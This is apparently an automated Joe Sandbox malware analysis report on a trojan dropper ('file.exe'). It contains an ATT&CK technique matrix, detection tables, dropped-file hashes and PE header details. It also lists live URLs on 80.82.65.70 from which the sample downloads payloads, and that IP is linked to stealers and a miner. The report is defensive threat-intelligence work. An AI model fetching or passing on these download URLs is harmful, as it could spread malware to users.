Source: Amcache.hve.6.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr | Binary or memory string: MsMpEng.exe
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 3 Command and Scripting Interpreter | 1 DLL Side-Loading | 2 Process Injection | 11 Masquerading | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 24 Virtualization/Sandbox Evasion | LSASS Memory | 781 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 12 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Process Injection | Security Account Manager | 24 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 3 Process Discovery | Distributed Component Object Model | Input Capture | 11 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 12 Software Packing | Cached Domain Credentials | 223 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Timestomp | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label
file.exe | 54% | Virustotal |
file.exe | 100% | Avira | HEUR/AGEN.1320706
file.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\dll[1] | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Bunifu_UI_v1.5.3.dll | 0% | ReversingLabs |
C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe | 75% | ReversingLabs | ByteCode-MSIL.Trojan.Malgent
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://80.82.65.70/files/download0/files/downloadMicrosoft | 0% | Virustotal |
http://80.82.65.70/files/downloadh | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/download0/files/downloadMicrosoft | 0% | Avira URL Cloud | safe
http://80.82.65.70/soft/download;.C | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/downloadns | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/downloadP | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/downloadP | 0% | Virustotal |
http://80.82.65.70/files/downloadPROu= | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/downloadz | 0% | Avira URL Cloud | safe
http://80.82.65.70/soft/download. | 100% | Avira URL Cloud | malware
http://80.82.65.70/files/downloadB | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/download0/files/downloadB | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/download;.C | 0% | Avira URL Cloud | safe
http://80.82.65.70/dll/downloads | 0% | Avira URL Cloud | safe
http://80.82.65.70/files/downloadMicrosoft | 0% | Avira URL Cloud | safe
No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://80.82.65.70/soft/download | false | | high
http://80.82.65.70/add?substr=mixtwo&s=three&sub=emp | false | | high
http://80.82.65.70/dll/download | false | | high
http://80.82.65.70/dll/key | false | | high
http://80.82.65.70/files/download | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
80.82.65.70 | unknown | Netherlands | 202425 | INT-NETWORKSC | false

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1574228
Start date and time:2024-12-13 06:11:10 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 25s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:default.jbs
Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:9
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Sample name:file.exe
Detection:MAL
Classification:mal100.evad.winEXE@2/15@0/1
EGA Information:
• Successful, ratio: 100%
HCA Information:Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 52.168.117.173, 20.12.23.50, 13.107.246.63, 20.231.128.66
• Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Time | Type | Description
00:12:29 | API Interceptor | 506x Sleep call for process: file.exe modified
00:13:29 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
80.82.65.70 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Unknown | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Unknown | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Unknown | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70/files/download
80.82.65.70 | file.exe | malicious | Unknown | 80.82.65.70/soft/download
80.82.65.70 | file.exe | malicious | Amadey, Credential Flusher, Stealc, Vidar | 80.82.65.70/soft/download
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
INT-NETWORKSC | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Unknown | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Amadey, Credential Flusher, Stealc, Vidar | 80.82.65.70
INT-NETWORKSC | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 80.82.65.70
No context

Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Socks5Systemz |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | Mk4JWS27SO.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | BsVEQQnfyN.exe | malicious | Unknown |
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\soft[1] | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar |

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):65536
Entropy (8bit):0.9701431690886135
Encrypted:false
SSDEEP:192:B52h+v8KPiA0u1xSE3judvszuiFJ8Z24IO8ThBV:x5ou1xFjPzuiFJ8Y4IO8r
MD5:0E953A8D2C7DEE845CA385041D4EC681
SHA1:BDE5DE28C0B96D53417B90B5C93C75D64D3E95BE
SHA-256:020705318130DAEC8BEA9B9496AC2E0C5D45E3CEF4C26DC651650943F800E265
SHA-512:95E5888D28F17A4061A5B490D5CBAE54440238DD3AAE6127393837FF394FD8B2AAC56F979B9176EFAE7BF97C32771B9445B0F3C6F6547BCE12B10E46F07D9C4D
Malicious:true
Reputation:low

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:Mini DuMP crash report, 14 streams, Fri Dec 13 05:13:00 2024, 0x1205a4 type
Category:dropped
Size (bytes):46434
Entropy (8bit):2.5464065656461674
Encrypted:false
SSDEEP:192:iemx+t4DXcOCjvXK0VKtOyoGn/Vx5uomgNzsNmuj98pdmZX2hFAnwCxq7UBS6F6T:3y+moOCjC0ffGn7hs0ABwCs4B1g7kY
MD5:B92EF533FCD7ECB8DE1ACFB4FF96EEA2
SHA1:A730182BEA55C3439EE922428F8F9D9519B40744
SHA-256:D08716AD0DC7DD6CCEEB0B144FDB3706B0CB7F3A113794FF6C714E76EC63F511
SHA-512:8343289FD48D8A943F1F11CBAD29D33E41DE6D9971A973057E63DBB78ECBD66F4F89AC9B610C73D45EF74D9C1FA07504D124D471874990EFE3FB7853BCDCE020
Malicious:false
Reputation:low

Process:C:\Windows\SysWOW64\WerFault.exe
File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:dropped
Size (bytes):8300
Entropy (8bit):3.6906134441117393
Encrypted:false
SSDEEP:192:R6l7wVeJVCv6GcNe6YEIsSU/gQgmfBGW1pDM89bYxsHsf0Im:R6lXJY6O6YEjSU/lgmfZ5YxsMfa
MD5:6B9035849145A06774A2CB4116521B97
SHA1:FFAAC7FFE23234BA33617E2C192142C6618F57FC
SHA-256:6EBA482C4FD492F4A50BA31347D01893C1A70B9654A049DCA7D453C8E3DEEEA0
SHA-512:B8998C33FE419DB9E012B36B50A9566B35FD64A3A636AD62F29572282CA48EBC40EE1F7F270EC783B518DAE6A0AD1BA83CDB736FF54537FDBE2FF3031F80994B
Malicious:false
Reputation:low
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):4541
                                          Entropy (8bit):4.430596009399601
                                          Encrypted:false
                                          SSDEEP:48:cvIwWl8zspJg77aI9G5WpW8VYYYm8M4JBRFFm+q82ikS+nd:uIjf7I7EI7VoJGCJ+nd
                                          MD5:3EF1F0FBFF6F56385655A4B0602B2331
                                          SHA1:93CDB4EEB6BFCE1844C50B81B7BDB8A27459F0C7
                                          SHA-256:76D7B7ACAC49D256563282480512A1FC6BCB09386958AD7E26D8AFD39A7543D6
                                          SHA-512:13BA747FC002EAE30CA81524ED5F1F43E42C383E09D7F9F36E3C294B5E0EE1C436275A8B014E0EBA837301D6432841CFB371AF23942DBC5353B8DF2CCA7F5ABA
                                          Malicious:false
                                          Reputation:low
                                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="629055" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):97296
                                          Entropy (8bit):7.9982317718947025
                                          Encrypted:true
                                          SSDEEP:1536:A1FazaNKjs9ezO6kGnCRFVjltPjM9Ew1MhiIeJfZCQdOlnq32YTCUZiyAS3tUX9F:k4zaMjVUGCRzbgqw1MoIeJyQ4nyqX9F
                                          MD5:E6743949BBF24B39B25399CD7C5D3A2E
                                          SHA1:DBE84C91A9B0ACCD2C1C16D49B48FAEAEC830239
                                          SHA-256:A3B82FC46635A467CC8375D40DDBDDD71CAE3B7659D2BB5C3C4370930AE9468C
                                          SHA-512:3D50396CDF33F5C6522D4C485D96425C0DDB341DB9BD66C43EAE6D8617B26A4D9B4B9A5AEE0457A4F1EC6FAC3CB8208C562A479DCAE024A50143CBFA4E1F15F6
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):21
                                          Entropy (8bit):3.880179922675737
                                          Encrypted:false
                                          SSDEEP:3:gFsR0GOWW:gyRhI
                                          MD5:408E94319D97609B8E768415873D5A14
                                          SHA1:E1F56DE347505607893A0A1442B6F3659BEF79C4
                                          SHA-256:E29A4FD2CB1F367A743EA7CFD356DBD19AEB271523BBAE49D4F53257C3B0A78D
                                          SHA-512:994FA19673C6ADC2CC5EF31C6A5C323406BB351551219EE0EEDA4663EC32DAF2A1D14702472B5CF7B476809B088C85C5BE684916B73046DA0DF72236BC6F5608
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:9tKiK3bsYm4fMuK47Pk3s
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Joe Sandbox View:
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          • Filename: Mk4JWS27SO.exe, Detection: malicious, Browse
                                          • Filename: BsVEQQnfyN.exe, Detection: malicious, Browse
                                          • Filename: file.exe, Detection: malicious, Browse
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:very short file (no magic)
                                          Category:dropped
                                          Size (bytes):1
                                          Entropy (8bit):0.0
                                          Encrypted:false
                                          SSDEEP:3:V:V
                                          MD5:CFCD208495D565EF66E7DFF9F98764DA
                                          SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                          SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                          SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                          Malicious:false
                                          Preview:0
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):242176
                                          Entropy (8bit):6.47050397947197
                                          Encrypted:false
                                          SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                          MD5:2ECB51AB00C5F340380ECF849291DBCF
                                          SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                          SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                          SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Category:dropped
                                          Size (bytes):1502720
                                          Entropy (8bit):7.646111739368707
                                          Encrypted:false
                                          SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                          MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                          SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                          SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                          SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 75%
                                          Process:C:\Users\user\Desktop\file.exe
                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Fri Dec 13 04:12:59 2024, mtime=Fri Dec 13 04:12:59 2024, atime=Fri Dec 13 04:12:59 2024, length=1502720, window=hide
                                          Category:dropped
                                          Size (bytes):2222
                                          Entropy (8bit):3.8744865980661203
                                          Encrypted:false
                                          SSDEEP:24:8gkCfE8OrNCRZgKI5KNrIiCGfxAVxg6ivN0KiCS8KiCSHO4Zg68qKiCSO1PhNqyT:84p7RbDfCbg6ivN0CFZg68qihEyg
                                          MD5:60672C17702CCFE838846CAC5446D481
                                          SHA1:FA5472AFEB6B95C2B5396243F1F1AA760FA2C28D
                                          SHA-256:55610B2100B771F1BC7C8F1E513122A52A1764434462AAC88A7555E61005E79A
                                          SHA-512:BC70DC43AC16C0051CFA10CE84C59047653C0F34AD4928ECBC19470F3D15E6DB8831838659845AF3F5E885ABDEF698DC1A244351CF58B9C01A761004A4F0A87F
                                          Malicious:false
                                          Preview:L..................F.@.. ...Z.r..M..Z.r..M..Z.r..M..........................B.:..DG..Yr?.D..U..k0.&...&...... M.....UQ+..M...t|..M......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSl.Y|)....B.....................Bdg.A.p.p.D.a.t.a...B.P.1......Y{)..Local.<......DWSl.Y|)....V.....................I...L.o.c.a.l.....N.1......Y|)..Temp..:......DWSl.Y|)....\.....................G"..T.e.m.p.....~.1......Y.)..VF1VAS~1..f......Y.).Y.)..........................O...v.f.1.v.A.s.w.4.V.1.4.D.J.W.w.e.e.1.e.C.d.f.d.3.e.4.....h.2......Y.) .Y-CLEA~1.EXE..L......Y.).Y.)....;.........................Y.-.C.l.e.a.n.e.r...e.x.e.......z...............-.......y...........A.o......C:\Users\user\AppData\Local\Temp\vf1vAsw4V14DJWwee1eCdfd3e4\Y-Cleaner.exe....M.a.k.e. .y.o.u.r. .P.C. .f.a.s.t.e.r.>.....\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.v.f.1.v.A.s.w.4.V.1.4.D.J.W.w.e.e.1.e.C.d.f.d.3.e.4.\.Y.-.C.l.e.a.n.e.r...e.x.e.K.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.
                                          Process:C:\Windows\SysWOW64\WerFault.exe
                                          File Type:MS Windows registry file, NT/2000 or above
                                          Category:dropped
                                          Size (bytes):1835008
                                          Entropy (8bit):4.421495614865974
                                          Encrypted:false
                                          SSDEEP:6144:qSvfpi6ceLP/9skLmb0OTMWSPHaJG8nAgeMZMMhA2fX4WABlEnN20uhiTw:ZvloTMW+EZMM6DFy403w
                                          MD5:836C4CC521C374F9277B6C75A26EEDBB
                                          SHA1:9B7D72B9A0D0ABB058DBB2332EB9BC3322400E36
                                          SHA-256:802950328BEE2AA94F1EAC857339049B8E9C972ECCBDC2BCED7502C98FCD5C2C
                                          SHA-512:493BD6CBBEC60E69741D4F32E68AA7F683FB283222462D1B3B21D55963F303BABCC46E0E92666464BC15314E0C3ADAA95FF338949985C5A6DF9A5BD38771A644
                                          Malicious:false
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                          Entropy (8bit):7.934093114361708
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:file.exe
                                          File size:1'933'312 bytes
                                          MD5:602574ce5a6eea6388a2d30a490ddfa9
                                          SHA1:efe09508381076205f1b23a03b1baea6d36eaa95
                                          SHA256:9edabdb564b79176743506ba6466765f5193ab2ce29f7bcbbb7f1a694ed54768
                                          SHA512:2425affe7ddb06e8beaaf9ebd430a6fef7b0789fe8a74251cd689da8f7722189a492b0047278933adbeb8bc8e77aafee8a360a0102f932b8ca9838525222fa00
                                          SSDEEP:49152:/EQd6B+ED8g4wZMiR2y4M8LVzjaYSJFwDqmRJ4fLzWmiD:/tojDf7ZiCgVzW2OYJ4X
                                          TLSH:D0953363DA88DE7CE881C7718531CDF1FE6DAA694E612476922DCF79C8337188BE5042
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d...................
                                          Icon Hash:c7a99a8aa651798c
                                          Entrypoint:0xc54000
                                          Entrypoint Section:.taggant
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x64DDDE0C [Thu Aug 17 08:45:00 2023 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:5
                                          OS Version Minor:0
                                          File Version Major:5
                                          File Version Minor:0
                                          Subsystem Version Major:5
                                          Subsystem Version Minor:0
                                          Import Hash:2eabe9054cad5152567f0699947a2c5b
                                          Instruction
                                          jmp 00007F8A2D24B49Ah
                                          divps xmm3, dqword ptr [00000000h]
                                          add cl, ch
                                          add byte ptr [eax], ah
                                          add byte ptr [eax], al
                                          Programming Language:
                                          • [C++] VS2008 build 21022
                                          • [ASM] VS2008 build 21022
                                          • [ C ] VS2008 build 21022
                                          • [IMP] VS2005 build 50727
                                          • [RES] VS2008 build 21022
                                          • [LNK] VS2008 build 21022
| Name | Virtual Address | Virtual Size | Is in Section |
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x42105a | 0x6e | .idata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x40e000 | 0x12168 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x847e58 | 0x18 | lerqcswm |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
